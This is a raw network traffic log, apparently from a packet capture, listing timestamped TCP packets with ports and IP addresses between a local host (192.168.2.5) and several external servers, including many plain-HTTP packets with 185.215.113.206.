Nov 11, 2024 10:33:23.181425095 CET	49801	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.181473970 CET	443	49801	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.181545973 CET	49801	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.183429003 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.183464050 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.183528900 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.183536053 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.183645010 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.184190989 CET	49802	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.184221029 CET	443	49802	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.184540987 CET	49802	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.184711933 CET	49802	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.184725046 CET	443	49802	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.184756041 CET	49798	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.184768915 CET	443	49798	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.184849024 CET	49799	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.184863091 CET	443	49799	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.185132027 CET	49800	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.185139894 CET	443	49800	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.185401917 CET	49801	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.185422897 CET	443	49801	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.188357115 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.193058014 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.193074942 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.193120003 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.193126917 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.193233013 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.197706938 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.197751999 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.197781086 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.197828054 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.197838068 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.198030949 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.202471018 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.202594995 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.202620983 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.202667952 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.202677011 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.202841997 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.207252026 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.230938911 CET	49805	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:23.230974913 CET	443	49805	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:23.231260061 CET	49805	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:23.231404066 CET	49805	443	192.168.2.5	20.50.73.10
Nov 11, 2024 10:33:23.231426001 CET	443	49805	20.50.73.10	192.168.2.5
Nov 11, 2024 10:33:23.232193947 CET	49806	443	192.168.2.5	108.139.47.33
Nov 11, 2024 10:33:23.232215881 CET	443	49806	108.139.47.33	192.168.2.5
Nov 11, 2024 10:33:23.232306004 CET	49806	443	192.168.2.5	108.139.47.33
Nov 11, 2024 10:33:23.232852936 CET	49807	443	192.168.2.5	20.1.248.118
Nov 11, 2024 10:33:23.232878923 CET	443	49807	20.1.248.118	192.168.2.5
Nov 11, 2024 10:33:23.232933998 CET	49807	443	192.168.2.5	20.1.248.118
Nov 11, 2024 10:33:23.233067036 CET	49806	443	192.168.2.5	108.139.47.33
Nov 11, 2024 10:33:23.233083963 CET	443	49806	108.139.47.33	192.168.2.5
Nov 11, 2024 10:33:23.233170986 CET	49807	443	192.168.2.5	20.1.248.118
Nov 11, 2024 10:33:23.233185053 CET	443	49807	20.1.248.118	192.168.2.5
Nov 11, 2024 10:33:23.276093006 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.276174068 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.276335955 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.276345015 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.283478022 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.283544064 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.285867929 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.285880089 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.285891056 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.285936117 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.285976887 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.288230896 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.288244963 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.288255930 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.288285017 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.288316011 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.290605068 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.290618896 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.290683031 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.292963982 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.292975903 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.293030024 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.295433998 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.295448065 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.295456886 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.295516014 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.295557022 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.384018898 CET	49808	443	192.168.2.5	23.200.0.34
Nov 11, 2024 10:33:23.384059906 CET	443	49808	23.200.0.34	192.168.2.5
Nov 11, 2024 10:33:23.384484053 CET	49808	443	192.168.2.5	23.200.0.34
Nov 11, 2024 10:33:23.384656906 CET	49808	443	192.168.2.5	23.200.0.34
Nov 11, 2024 10:33:23.384665966 CET	443	49808	23.200.0.34	192.168.2.5
Nov 11, 2024 10:33:23.396606922 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.396619081 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.396691084 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.397177935 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.397202969 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.397212982 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.397238970 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.397247076 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.397264004 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.397279024 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.397293091 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.397624969 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.397635937 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.397648096 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.397681952 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.397710085 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.397712946 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.397727013 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.397759914 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.397783041 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.398480892 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.398494005 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.398504972 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.398540974 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.398549080 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.398561954 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.398576021 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.398605108 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.399295092 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.399347067 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.399358988 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.399393082 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.399399042 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.399411917 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.399440050 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.399455070 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.400156975 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.400262117 CET	49809	443	192.168.2.5	20.110.205.119
Nov 11, 2024 10:33:23.400305033 CET	443	49809	20.110.205.119	192.168.2.5
Nov 11, 2024 10:33:23.400321960 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.400469065 CET	49809	443	192.168.2.5	20.110.205.119
Nov 11, 2024 10:33:23.400635958 CET	49809	443	192.168.2.5	20.110.205.119
Nov 11, 2024 10:33:23.400655031 CET	443	49809	20.110.205.119	192.168.2.5
Nov 11, 2024 10:33:23.447287083 CET	443	49794	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.447406054 CET	443	49795	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.447748899 CET	49810	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.447770119 CET	443	49810	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.447844982 CET	49810	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.447920084 CET	49811	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.447938919 CET	443	49811	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.447999001 CET	49811	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.448230982 CET	49812	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.448257923 CET	443	49812	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.448457956 CET	49812	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.448766947 CET	49813	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.448786020 CET	443	49813	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.448915005 CET	49814	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.448923111 CET	443	49814	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.448957920 CET	49813	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.448982954 CET	49814	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.449433088 CET	49814	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.449443102 CET	443	49814	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.449554920 CET	49813	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.449565887 CET	443	49813	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.449879885 CET	49812	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.449887037 CET	443	49812	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.450110912 CET	49811	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.450120926 CET	443	49811	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.450362921 CET	49810	443	192.168.2.5	23.44.133.12
Nov 11, 2024 10:33:23.450375080 CET	443	49810	23.44.133.12	192.168.2.5
Nov 11, 2024 10:33:23.451298952 CET	49795	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.451308012 CET	443	49795	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.451464891 CET	49794	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.451472044 CET	443	49794	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.451679945 CET	443	49795	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.451828957 CET	443	49794	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.454520941 CET	49794	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.454607010 CET	443	49794	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.454772949 CET	49795	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.454849958 CET	443	49795	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.502123117 CET	443	49796	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.502397060 CET	49796	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.502408981 CET	443	49796	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.503449917 CET	443	49796	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.503539085 CET	49796	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.505923986 CET	49796	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.505989075 CET	443	49796	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.516334057 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.516346931 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.516357899 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.516417027 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.516423941 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.516436100 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.516448021 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.516460896 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.516463041 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.516494036 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.516520977 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.516865015 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.516877890 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.516889095 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.516900063 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.516911983 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.516921997 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.516933918 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.516953945 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.516989946 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.517714977 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.517729044 CET	443	49797	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.517743111 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.517745018 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.517748117 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.517752886 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.517759085 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.517770052 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.517818928 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.517855883 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.518533945 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.518547058 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.518605947 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.518620014 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.518625975 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.518635035 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.518661976 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.518663883 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.518673897 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.518676996 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.518687010 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.518697023 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.518717051 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.518745899 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.519380093 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.519418955 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.519429922 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.519471884 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.519474030 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.519484043 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.519495964 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.519507885 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.519520998 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.519536972 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.520281076 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.520297050 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.520325899 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.520335913 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.520345926 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.520351887 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.520358086 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.520375013 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.520395041 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.520407915 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.521147966 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.521157980 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.521189928 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.521214962 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.521842957 CET	49797	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.521853924 CET	443	49797	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.522841930 CET	443	49797	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.522950888 CET	49797	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.523663998 CET	49797	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.523725033 CET	443	49797	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.621762991 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.621774912 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.621836901 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.622163057 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.622186899 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.622234106 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.622243881 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.622246027 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.622266054 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.622298956 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.622334003 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.622345924 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.622356892 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.622383118 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.622417927 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.622498989 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.622518063 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.622765064 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.622831106 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.622909069 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.622920036 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.622930050 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.622942924 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.622956038 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.622972965 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.622998953 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.623024940 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.623037100 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.623132944 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.623143911 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.623153925 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.623161077 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.623188972 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.623292923 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.623420954 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.623430967 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.623440981 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.623454094 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.623464108 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.623481035 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.623506069 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.623661041 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.623673916 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.623684883 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.623696089 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.623708010 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.623728037 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.623755932 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.623992920 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.624005079 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.624022961 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.624034882 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.624047995 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.624080896 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.624249935 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.624283075 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.624294996 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.624304056 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.624350071 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.624356985 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.624368906 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.624380112 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.624424934 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.624744892 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.624757051 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.624768972 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.624784946 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.624802113 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.624814034 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.624824047 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.624825001 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.624838114 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.624842882 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.624850988 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.624861956 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.624865055 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.624874115 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.624881029 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.624886036 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.624917030 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.624943972 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.626795053 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.626812935 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.626825094 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.626833916 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.626847029 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.626857996 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.626868963 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.626920938 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.626959085 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.630193949 CET	49795	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.630199909 CET	49796	443	192.168.2.5	172.64.41.3
